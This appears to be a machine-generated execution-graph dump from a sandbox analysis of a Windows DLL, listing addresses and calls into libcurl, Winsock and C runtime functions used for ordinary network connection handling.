                                                                                                                            execution_graph 21567 6b6ca760 125 API calls __fassign 21565 6b6c1260 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21568 6b6c5c60 30 API calls 2 library calls 21593 6b6ca4e0 curl_msnprintf 21591 6b6c7de0 gethostname ___from_strstr_to_strchr 21592 6b6cd8e0 119 API calls _strstr 21569 6b6e3760 51 API calls 2 library calls 21595 6b6e48e0 curl_mvaprintf 21081 6b6f07e0 recv 21082 6b6f081e 21081->21082 21083 6b6f07fb WSAGetLastError 21081->21083 21084 6b6c2370 curl_easy_init 21085 6b6c2387 21084->21085 21087 6b6c2390 21084->21087 21086 6b6c23c2 21087->21086 21090 6b6d1650 21087->21090 21091 6b6d165f 21090->21091 21109 6b6c23b8 21090->21109 21091->21109 21110 6b6e6bd0 21091->21110 21093 6b6d1675 21094 6b6d167f curl_multi_remove_handle 21093->21094 21095 6b6d1689 21093->21095 21094->21095 21096 6b6d1690 curl_multi_cleanup 21095->21096 21097 6b6d16a0 21095->21097 21096->21097 21116 6b6d1ce0 21097->21116 21099 6b6d16d9 21100 6b70d050 curl_slist_free_all 21099->21100 21102 6b6d1711 21100->21102 21101 6b6d5320 curl_url_cleanup 21103 6b6d1759 21101->21103 21102->21101 21104 6b6c6520 99 API calls 21103->21104 21105 6b6d1799 21104->21105 21106 6b6d18fe curl_slist_free_all 21105->21106 21107 6b6d1915 21106->21107 21108 6b6d1d40 curl_slist_free_all curl_slist_free_all 21107->21108 21108->21109 21111 6b6e6be2 21110->21111 21112 6b6e6c24 21110->21112 21111->21112 21120 6b6f9660 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21111->21120 21112->21093 21114 6b6e6c11 21114->21112 21115 6b6f06b0 74 API calls 21114->21115 21115->21112 21117 6b6d1cf3 21116->21117 21118 6b6d1650 106 API calls 21117->21118 21119 6b6d1d1f 21118->21119 21120->21114 21121 6b6c9870 21122 6b6c9879 21121->21122 21123 6b6c9882 21121->21123 21124 6b6d1650 106 API calls 21122->21124 21124->21123 21570 6b6cbc70 96 API calls __fassign 21571 6b6c7f70 7 API calls 21596 6b6c7bf0 5 API calls __fassign 21597 6b6c9ff0 107 API calls __fassign 21572 6b6ca740 curl_easy_unescape 20667 6b6c9bc0 20668 6b6c9bd6 20667->20668 20669 6b6c9bcd 20667->20669 20672 6b6c9be6 20668->20672 20673 6b6d21a0 20668->20673 20681 6b6ca2a0 31 API calls 20669->20681 20682 6b71f78d 20673->20682 20674 6b6d21ba 20674->20672 20675 6b6d21b1 20675->20674 20689 6b70cb20 curl_getenv 20675->20689 20677 6b6d2383 20690 6b6d6db0 curl_slist_free_all 20677->20690 20679 6b6d2442 20679->20672 20681->20668 20687 6b71f79a __dosmaperr 20682->20687 20683 6b71f7da 20692 6b711f49 14 API calls __dosmaperr 20683->20692 20684 6b71f7c5 RtlAllocateHeap 20685 6b71f7d8 20684->20685 20684->20687 20685->20675 20687->20683 20687->20684 20691 6b7248a6 EnterCriticalSection LeaveCriticalSection __dosmaperr 20687->20691 20689->20677 20690->20679 20691->20687 20692->20685 21599 6b6cdbc0 197 API calls __fassign 21573 6b6cc540 107 API calls 21600 6b6c29c0 recv 21574 6b700a40 52 API calls __fassign 21125 6b6c1050 21126 6b6c108f 21125->21126 21127 6b6c107b 21125->21127 21128 6b6fe5d0 2 API calls 21126->21128 21148 6b6d8a20 21127->21148 21132 6b6c10c6 __fassign 21128->21132 21130 6b6c118c 21179 6b711f49 14 API calls __dosmaperr 21130->21179 21132->21130 21136 6b6c1158 InitializeCriticalSectionEx 21132->21136 21137 6b6c1179 21132->21137 21133 6b6c11a7 21180 6b6f05d0 74 API calls __fassign 21133->21180 21135 6b6c11b9 21155 6b6f6d50 socket 21136->21155 21178 6b6c1670 DeleteCriticalSection closesocket __fassign 21137->21178 21140 6b6c1172 21140->21137 21142 6b6c11df 21140->21142 21141 6b6c122d 21182 6b6c15c0 8 API calls 21141->21182 21142->21141 21175 6b6c9120 21142->21175 21146 6b6c1240 21149 6b6d8a2a 21148->21149 21150 6b6d8a37 socket 21148->21150 21149->21126 21151 6b6d8a4c 21150->21151 21152 6b6d8a48 21150->21152 21183 6b6c28e0 closesocket 21151->21183 21152->21126 21154 6b6d8a54 21154->21126 21156 6b6f6d8d htonl setsockopt 21155->21156 21157 6b6f6f21 21155->21157 21158 6b6f6f0f closesocket closesocket closesocket 21156->21158 21159 6b6f6ddc bind 21156->21159 21160 6b70db71 __fassign 5 API calls 21157->21160 21158->21157 21159->21158 21161 6b6f6df2 getsockname 21159->21161 21162 6b6f6f31 21160->21162 21161->21158 21163 6b6f6e0a listen 21161->21163 21162->21140 21163->21158 21164 6b6f6e1c socket 21163->21164 21164->21158 21165 6b6f6e2f connect 21164->21165 21165->21158 21166 6b6f6e45 accept 21165->21166 21166->21158 21167 6b6f6e5c curl_msnprintf 21166->21167 21168 6b6f6e76 21167->21168 21168->21168 21169 6b6f6e7d send 21168->21169 21169->21158 21170 6b6f6e92 recv 21169->21170 21170->21158 21174 6b6f6ea7 21170->21174 21171 6b6f6ef5 closesocket 21172 6b70db71 __fassign 5 API calls 21171->21172 21173 6b6f6f0b 21172->21173 21173->21140 21174->21158 21174->21171 21184 6b718360 21175->21184 21177 6b6c1218 21177->21146 21181 6b711f49 14 API calls __dosmaperr 21177->21181 21178->21130 21179->21133 21180->21135 21181->21141 21182->21130 21183->21154 21185 6b718381 21184->21185 21186 6b71836d 21184->21186 21199 6b718310 21185->21199 21208 6b711f49 14 API calls __dosmaperr 21186->21208 21189 6b718372 21209 6b71f18d 25 API calls __fassign 21189->21209 21192 6b718396 CreateThread 21194 6b7183c1 21192->21194 21195 6b7183b5 GetLastError 21192->21195 21193 6b71837d 21193->21177 21211 6b718282 21194->21211 21210 6b711f13 14 API calls __dosmaperr 21195->21210 21200 6b71f78d __dosmaperr 14 API calls 21199->21200 21201 6b718321 21200->21201 21219 6b71f7ea 21201->21219 21203 6b71832e 21204 6b718352 21203->21204 21205 6b718335 GetModuleHandleExW 21203->21205 21206 6b718282 16 API calls 21204->21206 21205->21204 21207 6b71835a 21206->21207 21207->21192 21207->21194 21208->21189 21209->21193 21210->21194 21212 6b7182b2 21211->21212 21213 6b71828e 21211->21213 21212->21177 21214 6b718294 CloseHandle 21213->21214 21215 6b71829d 21213->21215 21214->21215 21216 6b7182a3 FreeLibrary 21215->21216 21217 6b7182ac 21215->21217 21216->21217 21218 6b71f7ea _free 14 API calls 21217->21218 21218->21212 21220 6b71f81e __dosmaperr 21219->21220 21221 6b71f7f5 RtlFreeHeap 21219->21221 21220->21203 21221->21220 21222 6b71f80a 21221->21222 21225 6b711f49 14 API calls __dosmaperr 21222->21225 21224 6b71f810 GetLastError 21224->21220 21225->21224 21232 6b6c16d0 curl_msnprintf 21248 6b6c6e10 getaddrinfo 21232->21248 21235 6b6c1739 EnterCriticalSection 21239 6b6c1747 LeaveCriticalSection 21235->21239 21240 6b6c1763 21235->21240 21236 6b6c1722 WSAGetLastError 21237 6b6c172c 21236->21237 21238 6b6c1728 WSAGetLastError 21236->21238 21237->21235 21238->21237 21254 6b6c1670 DeleteCriticalSection closesocket __fassign 21239->21254 21242 6b6c176b send 21240->21242 21243 6b6c1787 LeaveCriticalSection 21240->21243 21242->21243 21245 6b6c1782 WSAGetLastError 21242->21245 21244 6b6c1755 21243->21244 21246 6b70db71 __fassign 5 API calls 21244->21246 21245->21243 21247 6b6c17a5 21246->21247 21252 6b6c1713 21248->21252 21253 6b6c6e3f __fassign 21248->21253 21249 6b6c6f93 WSASetLastError 21249->21252 21250 6b6c6f4b freeaddrinfo 21251 6b6c6f52 21250->21251 21251->21249 21251->21252 21252->21235 21252->21236 21253->21249 21253->21250 21253->21251 21254->21244 21255 6b6cbdd0 21256 6b6cbe19 21255->21256 21257 6b6cbdf1 21255->21257 21284 6b6cd3d0 76 API calls 3 library calls 21256->21284 21283 6b6d0900 77 API calls _strrchr 21257->21283 21260 6b6cbe0f 21261 6b6cbdf6 21261->21260 21270 6b6ce4e0 195 API calls 21261->21270 21263 6b6cbe9b 21263->21260 21271 6b6eb380 106 API calls 21263->21271 21265 6b6cbeb2 21266 6b6f06b0 74 API calls 21265->21266 21267 6b6cbed9 21266->21267 21267->21260 21272 6b6cd1b0 21267->21272 21269 6b6cbef5 21270->21263 21271->21265 21273 6b6cd1cb 21272->21273 21274 6b6cd212 21272->21274 21285 6b6cc650 21273->21285 21275 6b6cd23d 21274->21275 21322 6b6ff7a0 76 API calls 21274->21322 21275->21269 21278 6b6cd1d5 21278->21274 21280 6b6cd1de 21278->21280 21279 6b6cd22c 21279->21269 21282 6b6cd1f0 21280->21282 21321 6b6c28e0 closesocket 21280->21321 21282->21269 21283->21261 21284->21261 21286 6b6cc6db 21285->21286 21287 6b6cc677 21285->21287 21375 6b6dee30 21286->21375 21289 6b6cc699 21287->21289 21290 6b6cc684 21287->21290 21323 6b6c2d20 21289->21323 21395 6b6ded60 165 API calls 21290->21395 21293 6b6cc6e3 21298 6b6cc740 21293->21298 21320 6b6cc855 21293->21320 21397 6b6eb380 106 API calls 21293->21397 21294 6b6cc690 21294->21278 21295 6b6cc6a5 21295->21286 21296 6b6cc6ae 21295->21296 21296->21320 21396 6b6cd2d0 78 API calls 21296->21396 21299 6b6cc894 21298->21299 21300 6b6cc780 21298->21300 21298->21320 21405 6b6ff7a0 76 API calls 21299->21405 21302 6b6cc789 21300->21302 21303 6b6cc7e3 21300->21303 21398 6b6ccf60 107 API calls 21302->21398 21315 6b6cc7ec 21303->21315 21401 6b6c8160 47 API calls 21303->21401 21305 6b6cc6d2 21305->21278 21308 6b6cc793 21310 6b6cc7c9 21308->21310 21399 6b6ccb00 80 API calls __fassign 21308->21399 21310->21278 21311 6b6cc84e 21311->21320 21404 6b6cc8c0 106 API calls 21311->21404 21314 6b6cc80c 21314->21311 21314->21315 21317 6b6cc83e 21314->21317 21315->21311 21403 6b6cd360 195 API calls 21315->21403 21316 6b6cc7af 21316->21310 21400 6b6ccec0 86 API calls 21316->21400 21402 6b6cd360 195 API calls 21317->21402 21320->21278 21321->21282 21322->21279 21324 6b6c2d6a 21323->21324 21325 6b6c2d80 21323->21325 21327 6b70db71 __fassign 5 API calls 21324->21327 21326 6b6fe5d0 2 API calls 21325->21326 21331 6b6c2d8c 21326->21331 21328 6b6c2d7c 21327->21328 21328->21295 21329 6b6c32c4 21432 6b6f05d0 74 API calls __fassign 21329->21432 21331->21329 21333 6b6c2e4c 21331->21333 21332 6b6c32cf 21335 6b70db71 __fassign 5 API calls 21332->21335 21334 6b6c2e55 21333->21334 21374 6b6c2e9a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21333->21374 21336 6b6c3f40 204 API calls 21334->21336 21337 6b6c32e4 21335->21337 21340 6b6c2e68 21336->21340 21337->21295 21338 6b6f03a0 16 API calls 21338->21374 21339 6b6c2e84 21341 6b70db71 __fassign 5 API calls 21339->21341 21340->21339 21342 6b6c4060 92 API calls 21340->21342 21343 6b6c2e96 21341->21343 21342->21339 21343->21295 21344 6b6c32af 21346 6b70db71 __fassign 5 API calls 21344->21346 21345 6b6c3130 21345->21344 21428 6b6c46a0 207 API calls 21345->21428 21349 6b6c32c0 21346->21349 21347 6b6c4740 SleepEx getsockopt WSAGetLastError 21347->21374 21349->21295 21350 6b6c3160 21350->21324 21359 6b6c316d 21350->21359 21351 6b6c3185 21354 6b6c31dd 21351->21354 21429 6b6c28e0 closesocket 21351->21429 21352 6b6f06b0 74 API calls 21352->21374 21353 6b6c3025 WSASetLastError 21353->21374 21406 6b6c3f40 21354->21406 21358 6b6c31f9 21358->21332 21363 6b6c320c 21358->21363 21430 6b6fa0e0 53 API calls 3 library calls 21359->21430 21361 6b6c326a 21431 6b6f05d0 74 API calls __fassign 21361->21431 21418 6b6c4060 21363->21418 21364 6b6c46a0 207 API calls 21364->21374 21368 6b6c3288 21368->21344 21370 6b6c3297 21368->21370 21369 6b70db71 __fassign 5 API calls 21371 6b6c3226 21369->21371 21372 6b70db71 __fassign 5 API calls 21370->21372 21371->21295 21373 6b6c32ab 21372->21373 21373->21295 21374->21338 21374->21345 21374->21347 21374->21351 21374->21352 21374->21353 21374->21364 21426 6b6d8450 21 API calls 21374->21426 21427 6b6fa0e0 53 API calls 3 library calls 21374->21427 21376 6b6dee5d 21375->21376 21385 6b6deea1 __fassign 21375->21385 21376->21385 21500 6b70cee0 21376->21500 21378 6b70db71 __fassign 5 API calls 21380 6b6df063 21378->21380 21379 6b6dee72 21381 6b6dee7f 21379->21381 21379->21385 21380->21293 21382 6b70db71 __fassign 5 API calls 21381->21382 21383 6b6dee9d 21382->21383 21383->21293 21386 6b6f06b0 74 API calls 21385->21386 21390 6b6def8e 21385->21390 21393 6b6df035 21385->21393 21394 6b6def7a 21385->21394 21386->21390 21387 6b6df022 21389 6b70db71 __fassign 5 API calls 21387->21389 21388 6b6defd5 21391 6b6f06b0 74 API calls 21388->21391 21388->21394 21392 6b6df031 21389->21392 21508 6b6de330 165 API calls ___from_strstr_to_strchr 21390->21508 21391->21394 21392->21293 21393->21378 21394->21387 21394->21393 21395->21294 21396->21305 21397->21298 21398->21308 21399->21316 21400->21310 21401->21314 21402->21311 21403->21311 21404->21310 21405->21320 21407 6b6c403b 21406->21407 21408 6b6c3f54 21406->21408 21407->21358 21409 6b6c3fcd 21408->21409 21410 6b6c4023 21408->21410 21412 6b6c3fd4 21409->21412 21413 6b6c3ff1 21409->21413 21435 6b6f05d0 74 API calls __fassign 21410->21435 21433 6b6f75d0 203 API calls __fassign 21412->21433 21434 6b6f6f40 191 API calls __fassign 21413->21434 21415 6b6c402f 21415->21358 21417 6b6c3fec 21417->21358 21419 6b6c408d 21418->21419 21420 6b6c4080 21418->21420 21436 6b6c36a0 21419->21436 21486 6b6ecc20 QueryPerformanceCounter GetTickCount 21420->21486 21423 6b6c409d 21487 6b6d28a0 74 API calls 21423->21487 21425 6b6c3214 21425->21369 21426->21374 21427->21374 21428->21350 21429->21354 21430->21361 21431->21368 21432->21332 21433->21417 21434->21417 21435->21415 21437 6b6c38bf 21436->21437 21438 6b6c36c6 21436->21438 21439 6b70db71 __fassign 5 API calls 21437->21439 21438->21437 21441 6b6c36e0 getpeername 21438->21441 21440 6b6c3999 21439->21440 21440->21423 21442 6b6c3708 WSAGetLastError 21441->21442 21443 6b6c3743 __fassign 21441->21443 21488 6b6fa0e0 53 API calls 3 library calls 21442->21488 21446 6b6c3760 getsockname 21443->21446 21445 6b6c3722 21489 6b6f05d0 74 API calls __fassign 21445->21489 21448 6b6c377c WSAGetLastError 21446->21448 21449 6b6c37b7 21446->21449 21490 6b6fa0e0 53 API calls 3 library calls 21448->21490 21450 6b6c2840 23 API calls 21449->21450 21453 6b6c37d7 21450->21453 21451 6b6c372f 21454 6b70db71 __fassign 5 API calls 21451->21454 21456 6b6c37de 21453->21456 21457 6b6c3820 21453->21457 21458 6b6c373f 21454->21458 21455 6b6c3796 21491 6b6f05d0 74 API calls __fassign 21455->21491 21492 6b711f49 14 API calls __dosmaperr 21456->21492 21460 6b6c2840 23 API calls 21457->21460 21458->21423 21464 6b6c3876 21460->21464 21462 6b6c37a3 21463 6b70db71 __fassign 5 API calls 21462->21463 21466 6b6c37b3 21463->21466 21464->21437 21467 6b6c387d 21464->21467 21465 6b6c37e3 21493 6b711f49 14 API calls __dosmaperr 21465->21493 21466->21423 21496 6b711f49 14 API calls __dosmaperr 21467->21496 21470 6b6c37ea 21494 6b6fa0e0 53 API calls 3 library calls 21470->21494 21471 6b6c3882 21497 6b711f49 14 API calls __dosmaperr 21471->21497 21474 6b6c37fe 21495 6b6f05d0 74 API calls __fassign 21474->21495 21475 6b6c3889 21498 6b6fa0e0 53 API calls 3 library calls 21475->21498 21478 6b6c380c 21480 6b70db71 __fassign 5 API calls 21478->21480 21479 6b6c389d 21499 6b6f05d0 74 API calls __fassign 21479->21499 21482 6b6c381c 21480->21482 21482->21423 21483 6b6c38ab 21484 6b70db71 __fassign 5 API calls 21483->21484 21485 6b6c38bb 21484->21485 21485->21423 21486->21419 21487->21425 21488->21445 21489->21451 21490->21455 21491->21462 21492->21465 21493->21470 21494->21474 21495->21478 21496->21471 21497->21475 21498->21479 21499->21483 21501 6b70cef8 21500->21501 21502 6b70cf2f 21501->21502 21504 6b70cf85 21501->21504 21506 6b70cf36 21501->21506 21510 6b6f05d0 74 API calls __fassign 21502->21510 21504->21379 21505 6b70cf6d 21505->21379 21506->21505 21509 6b6ecc20 QueryPerformanceCounter GetTickCount 21506->21509 21508->21388 21509->21505 21510->21504 21576 6b6c4850 74 API calls 21577 6b6cac50 30 API calls 21578 6b6d0d50 97 API calls 21580 6b6cbf20 110 API calls 21581 6b6ca720 curl_easy_escape 21582 6b6c8320 88 API calls 21603 6b6c9ba0 curl_slist_free_all curl_slist_free_all curl_maprintf curl_getenv 21604 6b6caca0 99 API calls 21605 6b6cc4a0 106 API calls 21607 6b6e7ea0 138 API calls 21007 6b6f0c20 21010 6b6f09f0 21007->21010 21009 6b6f0c45 21011 6b6f0b1a send 21010->21011 21012 6b6f0a54 21010->21012 21013 6b6f0b3e WSAGetLastError 21011->21013 21024 6b6f0b8e 21011->21024 21012->21011 21033 6b6f03a0 21012->21033 21015 6b6f0b4e 21013->21015 21016 6b6f0b69 21013->21016 21014 6b70db71 __fassign 5 API calls 21017 6b6f0bb4 21014->21017 21019 6b70db71 __fassign 5 API calls 21015->21019 21045 6b6fa0e0 53 API calls 3 library calls 21016->21045 21017->21009 21021 6b6f0b65 21019->21021 21021->21009 21022 6b6f0b7b 21046 6b6f05d0 74 API calls __fassign 21022->21046 21024->21014 21025 6b6f0abe 21026 6b6f0af5 recv 21025->21026 21027 6b6f0b13 21025->21027 21026->21011 21029 6b6f0b0e 21026->21029 21027->21011 21028 6b6f0a85 21028->21011 21028->21025 21030 6b6f0ad1 21028->21030 21029->21011 21031 6b70db71 __fassign 5 API calls 21030->21031 21032 6b6f0ae7 21031->21032 21032->21009 21034 6b6f03c0 21033->21034 21036 6b6f03e7 21033->21036 21035 6b6f03c9 21034->21035 21034->21036 21080 6b6f04d0 WSASetLastError Sleep 21035->21080 21047 6b6efef0 21036->21047 21039 6b6f03d4 21040 6b70db71 __fassign 5 API calls 21039->21040 21041 6b6f03e3 21040->21041 21041->21028 21042 6b70db71 __fassign 5 API calls 21043 6b6f04c0 21042->21043 21043->21028 21044 6b6f0431 21044->21042 21045->21022 21046->21024 21048 6b6eff10 21047->21048 21053 6b6eff2b 21047->21053 21048->21053 21065 6b6eff69 21048->21065 21049 6b6f0384 21051 6b70db71 __fassign 5 API calls 21049->21051 21050 6b6f0369 21054 6b6f037d Sleep 21050->21054 21055 6b6f0390 21051->21055 21052 6b6eff4d WSASetLastError 21057 6b70db71 __fassign 5 API calls 21052->21057 21053->21049 21053->21050 21053->21052 21056 6b6f0363 21053->21056 21054->21049 21055->21044 21056->21050 21056->21054 21058 6b6eff65 21057->21058 21058->21044 21059 6b6f00d9 21069 6b6f00e9 21059->21069 21073 6b6f0164 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21059->21073 21060 6b6f0100 WSASetLastError 21061 6b6f010e 21060->21061 21062 6b70db71 __fassign 5 API calls 21061->21062 21063 6b6f011b 21062->21063 21063->21044 21064 6b6f0237 select 21066 6b6f00fb 21064->21066 21065->21059 21065->21060 21066->21061 21079 6b6f027f 21066->21079 21067 6b6f0142 21070 6b6f0156 Sleep 21067->21070 21068 6b6f0129 WSASetLastError 21068->21066 21069->21066 21069->21067 21069->21068 21071 6b6f013c 21069->21071 21070->21066 21071->21067 21071->21070 21072 6b6f02a1 __WSAFDIsSet 21075 6b6f02df __WSAFDIsSet 21072->21075 21072->21079 21073->21064 21074 6b6f0350 21076 6b70db71 __fassign 5 API calls 21074->21076 21077 6b6f02fc __WSAFDIsSet 21075->21077 21075->21079 21078 6b6f035f 21076->21078 21077->21079 21078->21044 21079->21072 21079->21074 21079->21075 21079->21077 21080->21039 21226 6b6c9e30 21227 6b6c9e46 curl_multi_setopt curl_multi_add_handle 21226->21227 21229 6b6c9ef1 21227->21229 21230 6b6c9ef7 curl_multi_poll 21229->21230 21231 6b6c9f50 curl_multi_remove_handle 21229->21231 21230->21231 21610 6b6c71b0 8 API calls __fassign 20693 6b6ca080 20694 6b6ca097 20693->20694 20695 6b6ca09e 20694->20695 20698 6b6ca230 20694->20698 20697 6b6ca0b6 20699 6b6ca23b 20698->20699 20700 6b6ca241 20698->20700 20699->20697 20701 6b6ca24a 20700->20701 20705 6b6ca260 20700->20705 20708 6b6f05d0 74 API calls __fassign 20701->20708 20703 6b6ca255 20703->20697 20704 6b6ca28c 20704->20697 20705->20704 20709 6b6f05d0 74 API calls __fassign 20705->20709 20707 6b6ca281 20707->20697 20708->20703 20709->20707 20710 6b6cde80 20711 6b6cdeba 20710->20711 20712 6b6cdfdd 20711->20712 20718 6b6cded5 ___from_strstr_to_strchr 20711->20718 20714 6b6ce384 20712->20714 20715 6b6ce3a2 20712->20715 20730 6b6cdff5 20712->20730 20713 6b6ce388 20853 6b6cd2d0 78 API calls 20713->20853 20714->20713 20714->20715 20854 6b6f05d0 74 API calls __fassign 20715->20854 20717 6b6ce083 20807 6b6f05d0 74 API calls __fassign 20717->20807 20718->20713 20721 6b6cdfca 20718->20721 20796 6b6c6d50 47 API calls 20718->20796 20719 6b6ce38e 20723 6b70db71 __fassign 5 API calls 20719->20723 20805 6b6f05d0 74 API calls __fassign 20721->20805 20728 6b6ce39e 20723->20728 20724 6b6cdf6b 20732 6b70db71 __fassign 5 API calls 20724->20732 20727 6b6ce08e 20731 6b70db71 __fassign 5 API calls 20727->20731 20730->20717 20733 6b6ce0a7 20730->20733 20806 6b6c6d50 47 API calls 20730->20806 20734 6b6ce0a3 20731->20734 20735 6b6ce3c3 20732->20735 20733->20717 20740 6b6ce0fb 20733->20740 20736 6b6cdf26 20736->20721 20737 6b6cdf60 20736->20737 20738 6b6cdf73 20736->20738 20797 6b6f05d0 74 API calls __fassign 20737->20797 20738->20721 20752 6b6cdf77 20738->20752 20741 6b6ce12b curl_maprintf 20740->20741 20742 6b6ce104 20740->20742 20741->20752 20808 6b6f06b0 20742->20808 20744 6b6cdfb4 20798 6b70db71 20744->20798 20746 6b6ce16d 20818 6b6d84a0 20746->20818 20747 6b6ce201 20749 6b6d84a0 166 API calls 20747->20749 20748 6b6cdfc6 20750 6b6ce21e 20749->20750 20753 6b6ce233 20750->20753 20850 6b6c1520 88 API calls 20750->20850 20752->20744 20752->20746 20752->20747 20756 6b6ce24d 20753->20756 20757 6b6ce27b 20753->20757 20755 6b6ce1a0 20758 6b6ce1b5 20755->20758 20848 6b6c1520 88 API calls 20755->20848 20851 6b6f05d0 74 API calls __fassign 20756->20851 20783 6b6c2a60 20757->20783 20758->20757 20763 6b6ce1d3 20758->20763 20762 6b6ce262 20765 6b70db71 __fassign 5 API calls 20762->20765 20849 6b6f05d0 74 API calls __fassign 20763->20849 20764 6b6ce289 20767 6b6ce2ca 20764->20767 20774 6b6ce292 20764->20774 20768 6b6ce277 20765->20768 20779 6b6ce310 20767->20779 20852 6b6d8450 21 API calls 20767->20852 20769 6b6ce1e8 20771 6b70db71 __fassign 5 API calls 20769->20771 20773 6b6ce1fd 20771->20773 20772 6b6ce2f2 20777 6b6f06b0 74 API calls 20772->20777 20774->20713 20775 6b6ce2b7 20774->20775 20776 6b70db71 __fassign 5 API calls 20775->20776 20778 6b6ce2c6 20776->20778 20777->20779 20779->20744 20780 6b6ce360 20779->20780 20781 6b70db71 __fassign 5 API calls 20780->20781 20782 6b6ce380 20781->20782 20784 6b6c2a9d 20783->20784 20855 6b6fe5d0 20784->20855 20786 6b6c2c83 20948 6b6f05d0 74 API calls __fassign 20786->20948 20787 6b6c2ac8 20787->20786 20795 6b6c2b15 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20787->20795 20789 6b6c2c90 20789->20764 20790 6b6c2c55 20793 6b6c2c59 20790->20793 20947 6b6e69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20790->20947 20792 6b6c2c77 20792->20764 20793->20764 20795->20790 20859 6b6c40c0 20795->20859 20796->20736 20797->20724 20799 6b70db7a 20798->20799 20800 6b70db7c IsProcessorFeaturePresent 20798->20800 20799->20748 20802 6b70dc76 20800->20802 20980 6b70dc3a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20802->20980 20804 6b70dd59 20804->20748 20805->20724 20806->20730 20807->20727 20809 6b6f06cf 20808->20809 20817 6b6f0759 20808->20817 20811 6b6f06dc curl_mvsnprintf 20809->20811 20809->20817 20810 6b70db71 __fassign 5 API calls 20812 6b6f0767 20810->20812 20813 6b6f0737 20811->20813 20814 6b6f06fe curl_msnprintf 20811->20814 20812->20752 20981 6b6f0550 72 API calls 20813->20981 20814->20813 20817->20810 20819 6b6d84e7 20818->20819 20982 6b6d8840 20819->20982 20821 6b6d84ff 20822 6b6f06b0 74 API calls 20821->20822 20827 6b6d8515 20821->20827 20822->20827 20823 6b6d8589 inet_pton 20825 6b6d85b9 inet_pton 20823->20825 20826 6b6d859a 20823->20826 20824 6b70db71 __fassign 5 API calls 20828 6b6d8679 20824->20828 20830 6b6d85ca 20825->20830 20835 6b6d85d9 20825->20835 20998 6b6c6fb0 htons __fassign 20826->20998 20827->20823 20834 6b6d86cf 20827->20834 20839 6b6d8656 20827->20839 20828->20755 20999 6b6c6fb0 htons __fassign 20830->20999 20831 6b6d85a9 20831->20825 20833 6b6d867d 20831->20833 21003 6b6d7ae0 78 API calls __fassign 20833->21003 20836 6b70db71 __fassign 5 API calls 20834->20836 20835->20833 20835->20834 20841 6b6d8617 20835->20841 21000 6b6edb40 147 API calls __fassign 20835->21000 20838 6b6d86df 20836->20838 20838->20755 20839->20824 20841->20833 20842 6b6d8630 20841->20842 20842->20839 20843 6b6d864a 20842->20843 20844 6b6d8643 20842->20844 21002 6b6c1380 90 API calls 20843->21002 21001 6b6edcd0 112 API calls __fassign 20844->21001 20847 6b6d8648 20847->20834 20847->20839 20848->20758 20849->20769 20850->20753 20851->20762 20852->20772 20853->20719 20854->20724 20856 6b6fe642 GetTickCount 20855->20856 20857 6b6fe5e0 QueryPerformanceCounter 20855->20857 20856->20787 20858 6b6fe603 __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20857->20858 20858->20787 20860 6b6c4138 __fassign 20859->20860 20861 6b6c41af socket 20860->20861 20862 6b6c417c 20860->20862 20861->20862 20863 6b6c4512 20862->20863 20864 6b6c41e3 20862->20864 20962 6b6ea660 ioctlsocket 20862->20962 20867 6b70db71 __fassign 5 API calls 20863->20867 20949 6b6c2840 20864->20949 20868 6b6c4524 20867->20868 20868->20795 20869 6b6c420b 20870 6b6c4267 20869->20870 20871 6b6c4212 20869->20871 20872 6b6f06b0 74 API calls 20870->20872 20963 6b711f49 14 API calls __dosmaperr 20871->20963 20874 6b6c427c 20872->20874 20877 6b6c42fb 20874->20877 20879 6b6c42a8 setsockopt 20874->20879 20875 6b6c4217 20964 6b711f49 14 API calls __dosmaperr 20875->20964 20889 6b6c433a 20877->20889 20969 6b704f30 11 API calls __fassign 20877->20969 20878 6b6c421e 20965 6b6fa0e0 53 API calls 3 library calls 20878->20965 20879->20877 20881 6b6c42d2 WSAGetLastError 20879->20881 20968 6b6fa0e0 53 API calls 3 library calls 20881->20968 20882 6b6c4232 20966 6b6f05d0 74 API calls __fassign 20882->20966 20884 6b6c435e getsockopt 20890 6b6c438f setsockopt 20884->20890 20891 6b6c4381 20884->20891 20885 6b6c4341 20895 6b6c43c3 setsockopt 20885->20895 20903 6b6c43f4 20885->20903 20888 6b6c4245 20967 6b6c28e0 closesocket 20888->20967 20889->20884 20889->20885 20890->20885 20891->20885 20891->20890 20892 6b6c42ea 20896 6b6f06b0 74 API calls 20892->20896 20894 6b6c44bf 20898 6b6c44d6 20894->20898 20902 6b6c454c 20894->20902 20899 6b6c43e8 20895->20899 20906 6b6c43fc 20895->20906 20896->20877 20897 6b6c4251 20901 6b70db71 __fassign 5 API calls 20897->20901 20970 6b6c39a0 187 API calls __fassign 20898->20970 20900 6b6f06b0 74 API calls 20899->20900 20900->20903 20904 6b6c4263 20901->20904 20961 6b6ea660 ioctlsocket 20902->20961 20903->20894 20918 6b6c452c 20903->20918 20904->20795 20909 6b6c442e WSAIoctl 20906->20909 20908 6b6c4554 20911 6b6fe5d0 2 API calls 20908->20911 20909->20903 20912 6b6c446b WSAGetLastError 20909->20912 20910 6b6c44f0 20910->20902 20913 6b6c44fd 20910->20913 20914 6b6c4560 20911->20914 20915 6b6f06b0 74 API calls 20912->20915 20971 6b6c28e0 closesocket 20913->20971 20917 6b6c459e 20914->20917 20973 6b6e69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20914->20973 20915->20903 20919 6b6c467b 20917->20919 20923 6b6c45bb 20917->20923 20972 6b6c28e0 closesocket 20918->20972 20924 6b70db71 __fassign 5 API calls 20919->20924 20920 6b6c4504 20920->20863 20927 6b6c4604 WSAGetLastError 20923->20927 20928 6b6c45c4 connect 20923->20928 20929 6b6c4692 20924->20929 20925 6b6c458a 20974 6b6e69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20925->20974 20926 6b6c4533 20931 6b70db71 __fassign 5 API calls 20926->20931 20933 6b6c4615 20927->20933 20934 6b6c4660 20927->20934 20928->20927 20932 6b6c45dd 20928->20932 20929->20795 20936 6b6c4548 20931->20936 20932->20863 20937 